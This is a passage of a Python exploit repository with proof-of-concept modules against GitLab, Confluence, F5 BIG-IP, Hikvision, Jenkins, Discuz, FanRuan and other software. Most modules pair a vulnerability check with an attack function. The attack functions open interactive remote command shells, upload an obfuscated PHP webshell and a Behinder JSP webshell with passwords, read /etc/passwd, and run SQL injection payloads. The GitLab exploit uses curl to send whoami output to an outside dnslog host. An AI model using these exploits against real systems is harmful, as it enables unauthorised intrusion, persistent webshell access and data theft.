rep.text): 28 | result['vulnerable'] = True 29 | result['vurl'] = vurl 30 | result['method'] = "POST" 31 | result["data"] = payload_data 32 | return result 33 | except: 34 | return result 35 | -------------------------------------------------------------------------------- /pocs/web/CVE_2021_22205.py: -------------------------------------------------------------------------------- 1 | import requests 2 | from bs4 import BeautifulSoup 3 | import urllib 4 | 5 | 6 | def verify(url): 7 | relsult = { 8 | 'name': 'CVE-2021-22205 GitLab 未授权RCE', 9 | 'vulnerable': False 10 | } 11 | session = requests.Session() 12 | try: 13 | vulurl = urllib.parse.urljoin(url, "/users/sign_in") 14 | vulurl2 = urllib.parse.urljoin(url, "/uploads/user") 15 | req1 = session.get(vulurl, verify=False, timeout=10) 16 | soup = BeautifulSoup(req1.text, features="lxml") 17 | token = soup.findAll('meta')[16].get("content") 18 | data = "\r\n------WebKitFormBoundaryIMv3mxRg59TkFSX5\r\nContent-Disposition: form-data; name=\"file\"; filename=\"test.jpg\"\r\nContent-Type: image/jpeg\r\n\r\nAT&TFORM\x00\x00\x03\xafDJVMDIRM\x00\x00\x00.\x81\x00\x02\x00\x00\x00F\x00\x00\x00\xac\xff\xff\xde\xbf\x99 !\xc8\x91N\xeb\x0c\x07\x1f\xd2\xda\x88\xe8k\xe6D\x0f,q\x02\xeeI\xd3n\x95\xbd\xa2\xc3\"?FORM\x00\x00\x00^DJVUINFO\x00\x00\x00\n\x00\x08\x00\x08\x18\x00d\x00\x16\x00INCL\x00\x00\x00\x0fshared_anno.iff\x00BG44\x00\x00\x00\x11\x00J\x01\x02\x00\x08\x00\x08\x8a\xe6\xe1\xb17\xd9*\x89\x00BG44\x00\x00\x00\x04\x01\x0f\xf9\x9fBG44\x00\x00\x00\x02\x02\nFORM\x00\x00\x03\x07DJVIANTa\x00\x00\x01P(metadata\n\t(Copyright \"\\\n\" . qx{curl `whoami`.82sm53.dnslog.cn} . \\\n\" b \") ) \n\r\n------WebKitFormBoundaryIMv3mxRg59TkFSX5--\r\n\r\n" 19 | headers = { 20 | "User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", 21 | "Connection": "close", 22 | "Content-Type": "multipart/form-data; boundary=----WebKitFormBoundaryIMv3mxRg59TkFSX5", 23 | "X-CSRF-Token": f"{token}", "Accept-Encoding": "gzip, deflate"} 24 | flag = 'Failed to process image' 25 | req2 = session.post(vulurl2, data=data, headers=headers, verify=False, 26 | timeout=10) 27 | if flag in req2.text: 28 | relsult['vulnerable'] = True 29 | relsult['url'] = url 30 | relsult['about'] = 'https://blog.csdn.net/qq_51524329/article/details/121051714' \ 31 | ',https://github.com/r0eXpeR/CVE-2021-22205' 32 | return relsult 33 | else: 34 | return relsult 35 | except: 36 | return relsult 37 | 38 | -------------------------------------------------------------------------------- /pocs/web/CVE_2021_40870.py: -------------------------------------------------------------------------------- 1 | import requests 2 | from urllib.parse import urlparse 3 | import urllib 4 | 5 | def verify(base_url): 6 | relsult = { 7 | 'name': 'CVE-2021-40870 Aviatrix-Controller 远程代码执行', 8 | 'vulnerable': False 9 | } 10 | try: 11 | user = '''Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36''' 12 | filename = "RCE.php" 13 | shell = '''have fun : ) "; $cmd = ($_REQUEST['cmd']); system($cmd); echo ""; die; }?>''' 14 | oH = urlparse(base_url) 15 | a = oH.netloc.split(':') 16 | host = a[0] 17 | headers = { 18 | "Host": host, 19 | "User-Agent": user, 20 | "Connection": "close", 21 | "Content-Length": "109", 22 | "Content-Type": "application/x-www-form-urlencoded", 23 | "Accept-Encoding": "gzip", 24 | } 25 | timeout = 3 26 | body = f'CID=x&action=set_metric_gw_selections&account_name=/../../../var/www/php/{filename}&data=poc by agun{shell}' 27 | verify_url = urllib.parse.urljoin(base_url, '/v1/' + filename + '?cmd=') 28 | payload = urllib.parse.urljoin(base_url, '/v1/backend1') 29 | r = requests.post(payload, headers=headers, data=body, verify=False, timeout=timeout) 30 | check_file = requests.get(urllib.parse.urljoin(base_url, '/v1/' + filename), verify=False, timeout=timeout) 31 | check_file2 = requests.get(urllib.parse.urljoin(base_url, '/v1/axekfcerdps'), verify=False, timeout=timeout) 32 | verify_rep = requests.get(verify_url, headers=headers, timeout=timeout, verify=False) 33 | if check_file.status_code == 200 and check_file2.status_code != 200 and "have fun : )" in verify_rep.text: 34 | relsult['vulnerable'] = True 35 | relsult['url'] = base_url 36 | relsult['cmdshell'] = verify_url 37 | relsult['about'] = 'https://github.com/oxctdev/CVE-2021-40870' 38 | return relsult 39 | else: 40 | return relsult 41 | except: 42 | return relsult 43 | -------------------------------------------------------------------------------- /pocs/web/atlassian/CVE_2022_26134.py: -------------------------------------------------------------------------------- 1 | import urllib 2 | import requests 3 | import re 4 | 5 | def verify(url): 6 | relsult = { 7 | 'name': 'Atlassian Confluence 远程代码执行(CVE-2022-26134)', 8 | 'vulnerable': False, 9 | 'attack': True, 10 | 'url': url, 11 | 'about': 'https://mp.weixin.qq.com/s/L9zZdynW5bRaGESapw0oeA, ' 12 | 'https://github.com/jbaines-r7/through_the_wire', 13 | } 14 | headers = { 15 | 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 16 | 'Content-Type': 'application/x-www-form-urlencoded', 17 | 'Accept': '*/*', 18 | } 19 | cmd = 'whoami' 20 | vurl1 = urllib.parse.urljoin(url, '/login.action') 21 | vurl2 = urllib.parse.urljoin(url, '/%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22' + cmd + '%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D/') 22 | version = '' 23 | try: 24 | rep1 = requests.get(vurl1, verify=False, timeout=3) 25 | if rep1.status_code == 200: 26 | filter_version = re.findall(".*", rep1.text) 27 | if len(filter_version) >= 1: 28 | version = filter_version[0].split("'>")[1].split(' ') 53 | try: 54 | vurl = urllib.parse.urljoin(url, '/%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22' + cmd + '%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D/') 55 | rep = requests.get(vurl, headers=headers, verify=False, allow_redirects=False, timeout=3) 56 | if rep.status_code == 302: 57 | output = rep.headers['X-Cmd-Response'] 58 | print('[+] 执行结果: ', output) 59 | except: 60 | print('[+] 执行超时,请检查是否成功?') 61 | pass 62 | return True 63 | except: 64 | return False 65 | -------------------------------------------------------------------------------- /pocs/web/dahua/CVE_2021_33044.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import urllib, re 3 | 4 | def verify(url): 5 | result = { 6 | 'name': ' Dahua IPC/VTH/VTO devices Authentication Bypas(CVE-2021-33044)', 7 | 'vulnerable': False, 8 | 'attack': False, 9 | } 10 | headers = { 11 | "User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", 12 | } 13 | timeout = 3 14 | vurl = urllib.parse.urljoin(url, '/RPC2_Login') 15 | payload_data = '{"id": 1, "method": "global.login", "params": {"authorityType": "Default", "clientType": "NetKeyboard", "loginType": "Direct", "password": "Not Used", "passwordType": "Default", "userName": "admin"}, "session": 0}' 16 | try: 17 | rep = requests.get(vurl, timeout=timeout, verify=False, headers=headers, data=payload_data) 18 | if rep.status_code == 200 and re.search('\{"id":1,"params":\{"keepAliveInterval":60\},"result":true,"session":".+"\}', rep.text): 19 | result['vulnerable'] = True 20 | result['vurl'] = vurl 21 | return result 22 | except: 23 | return result -------------------------------------------------------------------------------- /pocs/web/discuz/discuz67x_rce.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import re 3 | import urllib 4 | 5 | 6 | def verify(url): 7 | relsult = { 8 | 'name': 'Discuz!6.x7.x全局变量防御绕过-命令执行', 9 | 'vulnerable': False, 10 | 'attack': True, 11 | } 12 | headers = { 13 | "User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", 14 | } 15 | cookies = { 16 | "GLOBALS[_DCACHE][smilies][searcharray]": "/.*/eui", 17 | "GLOBALS[_DCACHE][smilies][replacearray]": "phpinfo()", 18 | } 19 | try: 20 | tid = 1 # 默认页数 21 | vurl = urllib.parse.urljoin(url, '/viewthread.php?tid={0}'.format(tid)) 22 | rep = requests.get(vurl, headers=headers, timeout=3) 23 | 24 | if re.search('discuz', rep.text): 25 | rep2 = requests.get(vurl, headers=headers, cookies=cookies, timeout=3) 26 | if re.search('PHP Version', rep2.text): 27 | relsult['vulnerable'] = True 28 | relsult['url'] = url 29 | relsult['vurl'] = vurl 30 | relsult['about'] = 'https://blog.csdn.net/haha13l4/article/details/95949416' 31 | return relsult 32 | except: 33 | return relsult 34 | 35 | 36 | def attack(url): 37 | try: 38 | headers = { 39 | "User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", 40 | } 41 | cookies = { 42 | "GLOBALS[_DCACHE][smilies][searcharray]": "/.*/eui", 43 | "GLOBALS[_DCACHE][smilies][replacearray]": "eval(Chr(102).Chr(112).Chr(117).Chr(116).Chr(115).Chr(40).Chr(102).Chr(111).Chr(112).Chr(101).Chr(110).Chr(40).Chr(39).Chr(119).Chr(102).Chr(46).Chr(112).Chr(104).Chr(112).Chr(39).Chr(44).Chr(39).Chr(119).Chr(39).Chr(41).Chr(44).Chr(39).Chr(60).Chr(63).Chr(112).Chr(104).Chr(112).Chr(32).Chr(64).Chr(101).Chr(118).Chr(97).Chr(108).Chr(40).Chr(36).Chr(95).Chr(80).Chr(79).Chr(83).Chr(84).Chr(91).Chr(108).Chr(97).Chr(108).Chr(97).Chr(108).Chr(97).Chr(93).Chr(41).Chr(63).Chr(62).Chr(39).Chr(41).Chr(59))", 44 | } 45 | relsult = verify(url) 46 | if relsult['vulnerable']: 47 | vurl = relsult['vurl'] 48 | print('[+] 正在写入木马 ......') 49 | rep2 = requests.get(vurl, headers=headers, cookies=cookies, timeout=5) 50 | webshell = urllib.parse.urljoin(url, 'wf.php') 51 | verify_rep = requests.get(webshell, timeout=5) 52 | if rep2.status_code == 200 and verify_rep.status_code == 200: 53 | print('[+] 文件写入成功!') 54 | print('[*] webshell地址(蚁剑): ', webshell) 55 | print('[*] 密码: lalala') 56 | return True 57 | return False 58 | else: 59 | return False 60 | except: 61 | return False -------------------------------------------------------------------------------- /pocs/web/f5/CVE_2022_1388.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import urllib, re 3 | 4 | def verify(url): 5 | relsult = { 6 | 'name': 'CVE-2022-1388 F5-BIGIP iControl REST绕过授权访问漏洞', 7 | 'vulnerable': False, 8 | 'attack': True, 9 | 'url': url, 10 | 'about': 'https://github.com/horizon3ai/CVE-2022-1388/blob/main/CVE-2022-1388.py, ' 11 | 'https://github.com/0xf4n9x/CVE-2022-1388/blob/main/CVE-2022-1388.py', 12 | } 13 | headers = { 14 | 'Host': '127.0.0.1', 15 | 'Authorization': 'Basic YWRtaW46aG9yaXpvbjM=', 16 | 'X-F5-Auth-Token': 'asdf', 17 | 'Connection': 'X-F5-Auth-Token', 18 | 'Content-Type': 'application/json' 19 | 20 | } 21 | cmd = 'id' 22 | try: 23 | vurl = urllib.parse.urljoin(url, '/mgmt/tm/util/bash') 24 | j = {"command": "run", "utilCmdArgs": "-c '{0}'".format(cmd)} 25 | rep = requests.post(vurl, headers=headers, json=j, verify=False, timeout=5) 26 | if rep.status_code == 200 and re.search('commandResult', rep.text) and re.search('tm:util:bash:runstate', rep.text): 27 | relsult['vulnerable'] = True 28 | relsult['url'] = url 29 | relsult['about'] = 'https://github.com/horizon3ai/CVE-2022-1388/blob/main/CVE-2022-1388.py, ' \ 30 | 'https://github.com/0xf4n9x/CVE-2022-1388/blob/main/CVE-2022-1388.py' 31 | return relsult 32 | else: 33 | return relsult 34 | except: 35 | return relsult 36 | 37 | def attack(url): 38 | 39 | headers = { 40 | 'Authorization': 'Basic YWRtaW46aG9yaXpvbjM=', 41 | 'X-F5-Auth-Token': 'asdf', 42 | 'Connection': 'X-F5-Auth-Token', 43 | 'Content-Type': 'application/json' 44 | 45 | } 46 | print('[+] 开始执行命令(输入exit退出)!') 47 | cmd = '' 48 | try: 49 | while cmd != 'exit': 50 | cmd = input('[+] 执行命令 > ') 51 | try: 52 | vurl = urllib.parse.urljoin(url, '/mgmt/tm/util/bash') 53 | j = {"command": "run", "utilCmdArgs": "-c '{0}'".format(cmd)} 54 | rep = requests.post(vurl, headers=headers, json=j, verify=False, timeout=3) 55 | if rep.status_code == 200 and re.search('commandResult', rep.text) and re.search('tm:util:bash:runstate', rep.text): 56 | output = rep.json()['commandResult'] 57 | print('[+] 执行结果: ', output) 58 | except: 59 | print('[+] 执行超时,请检查是否成功?') 60 | pass 61 | return True 62 | except: 63 | return False -------------------------------------------------------------------------------- /pocs/web/fanruan/fanruan_oa_v9_fileupload.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import re, time 3 | import urllib, random, string 4 | 5 | def verify(url): 6 | relsult = { 7 | 'name': '帆软报表 V9 design_save_svg 任意文件覆盖文件上传 ', 8 | 'vulnerable': False, 9 | 'attack': True, 10 | 'url': url, 11 | 'about': 'http://wiki.peiqi.tech/wiki/oa/%E5%B8%86%E8%BD%AFOA/%E5%B8%86%E8%BD%AF%E6%8A%A5%E8%A1%A8%20V9%20design_save_svg%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%A6%86%E7%9B%96%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0.html', 12 | } 13 | randstr1 = ''.join(random.sample(string.digits + string.ascii_letters, 4)) 14 | randstr2 = ''.join(random.sample(string.digits + string.ascii_letters, 4)) 15 | shell = f'<%out.println(\"{randstr1}\"+\"{randstr2}\");%>' 16 | payload = '/WebReport/ReportServer?op=svginit&cmd=design_save_svg&filePath=chartmapsvg/../../../../WebReport/update.jsp' 17 | timeout = 3 18 | headers = { 19 | 'User-Agent': 'Mozilla/5.0 (compatible, MSIE 9.0, Windows NT 6.1, Trident/5.0)', 20 | 'Content-Type': 'text/xml;charset=UTF-8', 21 | } 22 | vurl = urllib.parse.urljoin(url, payload) 23 | data = { 24 | "__CONTENT__": shell, 25 | "__CHARSET__": "UTF-8", 26 | } 27 | verify_url = urllib.parse.urljoin(url, '/WebReport/update.jsp') 28 | try: 29 | rep1 = requests.post(vurl, headers=headers, timeout=timeout, json=data, verify=False) 30 | if rep1.status_code == 200 and re.search('FineReport', rep1.text): 31 | rep2 = requests.get(verify_url, timeout=timeout, headers={'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36'}, verify=False) 32 | if rep2.status_code == 200 and re.search(randstr1 + randstr2, rep2.text): 33 | relsult['vulnerable'] = True 34 | relsult['verify'] = verify_url 35 | return relsult 36 | except: 37 | return relsult 38 | 39 | def attack(url): 40 | shell = '<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if (request.getMethod().equals("POST")){String k="e45e329feb5d925b";session.putValue("u",k);Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec(k.getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);}%>' 41 | payload = '/WebReport/ReportServer?op=svginit&cmd=design_save_svg&filePath=chartmapsvg/../../../../WebReport/update.jsp' 42 | timeout = 20 43 | headers = { 44 | 'User-Agent': 'Mozilla/5.0 (compatible, MSIE 9.0, Windows NT 6.1, Trident/5.0)', 45 | 'Content-Type': 'text/xml;charset=UTF-8', 46 | } 47 | vurl = urllib.parse.urljoin(url, payload) 48 | data = { 49 | "__CONTENT__": shell, 50 | "__CHARSET__": "UTF-8", 51 | } 52 | webshell = urllib.parse.urljoin(url, '/WebReport/update.jsp') 53 | print('[+] Exploit loading ......') 54 | time.sleep(3) 55 | try: 56 | print('[+] 尝试上传冰蝎webshell ') 57 | rep = requests.post(vurl, headers=headers, timeout=timeout, json=data, verify=False) 58 | print('[+] 上传完毕,正在检测webshel是否成功?') 59 | if rep.status_code == 200: 60 | rep2 = requests.get(webshell, timeout=timeout, headers={'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36'}, verify=False) 61 | if rep2.status_code == 200: 62 | print('[*] status_code: 200 , 上传成功!') 63 | print('[*] webshell(冰蝎):', webshell) 64 | print('[*] 密码: rebeyond') 65 | return True 66 | return False 67 | except: 68 | return False -------------------------------------------------------------------------------- /pocs/web/h2database/h2console_unauth.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import re 3 | import urllib 4 | 5 | def verify(url): 6 | relsult = { 7 | 'name': 'H2-Database-Console 未授权访问', 8 | 'vulnerable': False, 9 | 'attack': False, 10 | 'about': 'https://blog.csdn.net/weixin_45366453/article/details/125525496, https://blog.csdn.net/zy15667076526/article/details/111413979' 11 | } 12 | timeout = 3 13 | headers = { 14 | 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0', 15 | } 16 | vurl = urllib.parse.urljoin(url, '/h2-console/login.jsp') 17 | try: 18 | rep = requests.get(vurl, headers=headers, verify=False, timeout=timeout) 19 | if rep.status_code == 200 and re.search('Welcome to H2', rep.text) and re.search('H2 Console', rep.text): 20 | relsult['vulnerable'] = True 21 | relsult['vurl'] = vurl 22 | return relsult 23 | except: 24 | return relsult 25 | -------------------------------------------------------------------------------- /pocs/web/hikvision/CVE_2017_7921.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import urllib, re 3 | 4 | def verify(url): 5 | relsult = { 6 | 'name': '海康威视 未授权访问(CVE-2017-7921)', 7 | 'vulnerable': False, 8 | 'url': url, 9 | 'attack': True, 10 | 'about': 'https://www.likecs.com/show-438911.html' 'https://github.com/WormChickenWizard/hikvision-decrypter', 11 | } 12 | timeout = 3 13 | headers = { 14 | 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0', 15 | 'Content-Type': 'application/x-www-form-urlencoded', 16 | } 17 | payload1 = '/Security/users?auth=YWRtaW46MTEK' 18 | payload2 = '/onvif-http/snapshot?auth=YWRtaW46MTEK' 19 | payload3 = '/System/configurationFile?auth=YWRtaW46MTEK' 20 | vurl1 = urllib.parse.urljoin(url, payload1) 21 | vurl2 = urllib.parse.urljoin(url, payload2) 22 | vurl3 = urllib.parse.urljoin(url, payload3) 23 | try: 24 | finger_rep = requests.get(url, headers=headers, verify=False, timeout=timeout) 25 | if len(finger_rep.headers['ETag']) > 0: 26 | rep1 = requests.get(vurl1, timeout=timeout, headers=headers, verify=False) 27 | if rep1.status_code == 200 and re.search('.+', rep1.text) and re.search('hikvision.com', rep1.text): 28 | relsult['vulnerable'] = True 29 | relsult['verify'] = vurl1 30 | return relsult 31 | except: 32 | return relsult 33 | 34 | def attack(url): 35 | timeout = 10 36 | headers = { 37 | 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0', 38 | 'Content-Type': 'application/x-www-form-urlencoded', 39 | } 40 | payload1 = '/Security/users?auth=YWRtaW46MTEK' 41 | payload2 = '/onvif-http/snapshot?auth=YWRtaW46MTEK' 42 | payload3 = '/System/configurationFile?auth=YWRtaW46MTEK' 43 | vurl1 = urllib.parse.urljoin(url, payload1) 44 | vurl2 = urllib.parse.urljoin(url, payload2) 45 | vurl3 = urllib.parse.urljoin(url, payload3) 46 | try: 47 | print('[+] 尝试未授权访问配置文件......') 48 | try: 49 | print('[+] Try get :', vurl1) 50 | rep1 = requests.get(vurl1, timeout=timeout, headers=headers, verify=False) 51 | print('[*] status: 200, size: ', len(rep1.text)) 52 | except: 53 | print('[-] status: ', rep1.status_code) 54 | pass 55 | try: 56 | print('[+] Try get:', vurl2) 57 | rep2 = requests.get(vurl2, timeout=timeout, headers=headers, verify=False) 58 | print('[*] status: 200, size: ', len(rep2.text)) 59 | except: 60 | print('[-] status: ', rep2.status_code) 61 | pass 62 | try: 63 | print('[+] Try get:', vurl3) 64 | rep3 = requests.get(vurl3, timeout=timeout, headers=headers, verify=False) 65 | print('[*] status: 200, size: ', len(rep3.text)) 66 | print('[*] 检测到配置文件存在,可从 https://github.com/WormChickenWizard/hikvision-decrypter 下载解密工具进行登录!') 67 | except: 68 | print('[-] status: ', rep3.status_code) 69 | return True 70 | except: 71 | return False -------------------------------------------------------------------------------- /pocs/web/hikvision/CVE_2021_36260.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import urllib, re 3 | import string, random 4 | 5 | def verify(url): 6 | relsult = { 7 | 'name': '海康威视 未授权RCE(CVE-2021-36260)', 8 | 'vulnerable': False, 9 | 'url': url, 10 | 'attack': True, 11 | 'about': 'https://www.exploit-db.com/exploits/50441', 12 | } 13 | randstr = ''.join(random.sample(string.digits + string.ascii_letters, 20)) 14 | cmd = 'echo {0}'.format(randstr) 15 | timeout = 5 16 | headers = { 17 | 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0', 18 | 'X-Requested-With': 'XMLHttpRequest', 19 | 'Content-Type': 'application/x-www-form-urlencoded', 20 | } 21 | payload = '' \ 22 | '' \ 23 | '$({0}>webLib/cmd.txt)' \ 24 | ''.format(cmd) 25 | vurl = urllib.parse.urljoin(url, '/SDK/webLanguage') 26 | verify_url = urllib.parse.urljoin(url, '/cmd.txt') 27 | try: 28 | finger_rep = requests.get(url, headers=headers, verify=False, timeout=timeout) 29 | if len(finger_rep.headers['ETag']) > 0: 30 | rep = requests.put(vurl, timeout=timeout, verify=False, headers=headers, data=payload.encode('utf-8')) 31 | rep2 = requests.get(verify_url, timeout=timeout, verify=False, headers=headers) 32 | if rep.status_code == 500 and rep2.status_code == 200 and re.search(randstr, rep2.text): 33 | relsult['vulnerable'] = True 34 | relsult['verify'] = verify_url 35 | return relsult 36 | except: 37 | return relsult 38 | 39 | def attack(url): 40 | timeout = 5 41 | headers = { 42 | 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0', 43 | 'X-Requested-With': 'XMLHttpRequest', 44 | 'Content-Type': 'application/x-www-form-urlencoded', 45 | } 46 | vurl = urllib.parse.urljoin(url, '/SDK/webLanguage') 47 | verify_url = urllib.parse.urljoin(url, '/cmd.txt') 48 | print('[+] Exploit loading......') 49 | try: 50 | cmd = '' 51 | while cmd != 'exit': 52 | cmd = input('[+] 执行命令 > ') 53 | payload = '' \ 54 | '' \ 55 | '$({0}>webLib/cmd.txt)' \ 56 | ''.format(cmd) 57 | rep = requests.put(vurl, timeout=timeout, verify=False, headers=headers, data=payload.encode('utf-8')) 58 | rep2 = requests.get(verify_url, timeout=timeout, verify=False, headers=headers) 59 | print('[*] Output:', rep2.text) 60 | 61 | return True 62 | except: 63 | return False 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | -------------------------------------------------------------------------------- /pocs/web/jenkins/CVE_2018_1000861.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import re 3 | import urllib 4 | import binascii 5 | 6 | def verify(url): 7 | relsult = { 8 | 'name': 'Jenkins远程命令执行漏洞(CVE-2018-1000861)', 9 | 'vulnerable': False, 10 | 'attack': True, 11 | } 12 | try: 13 | headers = { 14 | 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0', 15 | } 16 | endpoint = '/descriptorByName/org.jenkinsci.plugins.scriptsecurity.sandbox.groovy.SecureGroovyScript/checkScript' 17 | cmd = 'whoami' 18 | payload = 'public class x{public x(){new String("%s".decodeHex()).execute()}}' % binascii.hexlify(cmd.encode('utf-8')).decode('utf-8') 19 | params = { 20 | 'sandbox': True, 21 | 'value': payload 22 | } 23 | req = requests.get(url, headers=headers, timeout=4) 24 | if re.search('Jenkins', str(req.headers)) and re.search('adjuncts', req.text) and req.status_code == 200: 25 | vurl = urllib.parse.urljoin(url, endpoint) 26 | rep2 = requests.get(vurl, headers=headers, timeout=5) 27 | if rep2.status_code != 404: 28 | rep3 = requests.get(vurl, params=params, headers=headers, timeout=5) 29 | if rep3.status_code == 200: 30 | relsult['vulnerable'] = True 31 | relsult['url'] = url 32 | relsult['about'] = 'https://github.com/orangetw/awesome-jenkins-rce-2019/blob/master/exp.py' 33 | return relsult 34 | except: 35 | return relsult 36 | 37 | 38 | def attack(url): 39 | try: 40 | headers = { 41 | 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0', 42 | } 43 | endpoint = '/descriptorByName/org.jenkinsci.plugins.scriptsecurity.sandbox.groovy.SecureGroovyScript/checkScript' 44 | cmd = '' 45 | print('[+] 开始执行命令, 输入exit退出!') 46 | while cmd != 'exit': 47 | cmd = input('[+] 执行命令(无回显) >') 48 | payload = 'public class x{public x(){new String("%s".decodeHex()).execute()}}' % binascii.hexlify(cmd.encode('utf-8')).decode('utf-8') 49 | params = { 50 | 'sandbox': True, 51 | 'value': payload 52 | } 53 | vurl = urllib.parse.urljoin(url, endpoint) 54 | rep3 = requests.get(vurl, params=params, headers=headers, timeout=10) 55 | if rep3.status_code == 200: 56 | print('[*] 命令执行成功,请用dnslog验证!') 57 | else: 58 | print('[-] 未知错误,请到dnslog检查是否有回显?') 59 | return True 60 | except: 61 | return False -------------------------------------------------------------------------------- /pocs/web/landray/landray_oa_custom_jsp_fileread.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import urllib, re 3 | 4 | def verify(url): 5 | relsult = { 6 | 'name': '蓝凌OA custom.jsp 任意文件读取漏洞', 7 | 'vulnerable': False, 8 | 'url': url, 9 | 'attack': True, 10 | 'about': 'https://mp.weixin.qq.com/s/TkUZXKgfEOVqoHKBr3kNdw', 11 | } 12 | timeout = 3 13 | headers = { 14 | 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0', 15 | 'Content-Type': 'application/x-www-form-urlencoded', 16 | } 17 | vurl = urllib.parse.urljoin(url, '/sys/ui/extend/varkind/custom.jsp') 18 | data = 'var={"body":{"file":"file:///etc/passwd"}}' 19 | data2 = 'var={"body":{"file":"file:///c://windows/win.ini"}}' 20 | try: 21 | finger_rep = requests.get(vurl, headers=headers, verify=False, timeout=timeout, data=data) 22 | if re.search('/sys/ui/extend/', finger_rep.text) and finger_rep.status_code == 500: 23 | rep1 = requests.post(vurl, headers=headers, verify=False, timeout=timeout, data=data) 24 | rep2 = requests.post(vurl, headers=headers, verify=False, timeout=timeout, data=data2) 25 | if rep1.status_code == 200 and re.search('root:.*:0:0', rep1.text): 26 | relsult['vulnerable'] = True 27 | relsult['os'] = 'linux' 28 | relsult['vurl'] = vurl 29 | if rep2.status_code == 200 and re.search('for 16-bit app support', rep1.text): 30 | relsult['vulnerable'] = True 31 | relsult['os'] = 'windows' 32 | relsult['vurl'] = vurl 33 | return relsult 34 | except: 35 | return relsult -------------------------------------------------------------------------------- /pocs/web/seeyon/seeyon_a6_sqli.py: -------------------------------------------------------------------------------- 1 | import re, requests 2 | import urllib 3 | 4 | def verify(url): 5 | relsult = { 6 | 'name': '致远OA A6 sql注入漏洞', 7 | 'vulnerable': False 8 | } 9 | payloads = [ 10 | '/ext/trafaxserver/ExtnoManage/setextno.jsp?user_ids=(17)%20UnIoN%20SeLeCt%201,2,md5(1234),1%23', 11 | '/common/js/menu/test.jsp?doType=101&S1=SeLeCt%20Md5(1234)', 12 | '/HJ/iSignatureHtmlServer.jsp?COMMAND=DELESIGNATURE&DOCUMENTID=1&SIGNATUREID=2%27AnD%20(SeLeCt%201%20FrOm%20(SeLeCt%20CoUnT(*),CoNcaT(Md5(1234),FlOoR(RaNd(0)*2))x%20FrOm%20InFoRmAtIoN_ScHeMa.TaBlEs%20GrOuP%20By%20x)a)%23', 13 | "/ext/trafaxserver/ToSendFax/messageViewer.jsp?fax_id=-1'UnIoN%20AlL%20SeLeCt%20NULL,Md5(1234),NULL,NULL%23", 14 | '/ext/trafaxserver/SendFax/resend.jsp?fax_ids=(1)%20AnD%201=2%20UnIon%20SeLeCt%20Md5(1234)%20--', 15 | ] 16 | try: 17 | for payload in payloads: 18 | try: 19 | vurl = urllib.parse.urljoin(url, payload) 20 | req = requests.get(vurl, timeout=2) 21 | if re.search('81dc9bdb52d04dc20036dbd8313ed055', req.text) or re.search('52d04dc20036dbd8', req.text): 22 | relsult['vulnerable'] = True 23 | relsult['url'] = url 24 | relsult['payload'] = vurl 25 | relsult['about'] = 'https://www.cnblogs.com/AtesetEnginner/p/12106741.html' 26 | return relsult 27 | except: 28 | continue 29 | return relsult 30 | except: 31 | return relsult 32 | 33 | -------------------------------------------------------------------------------- 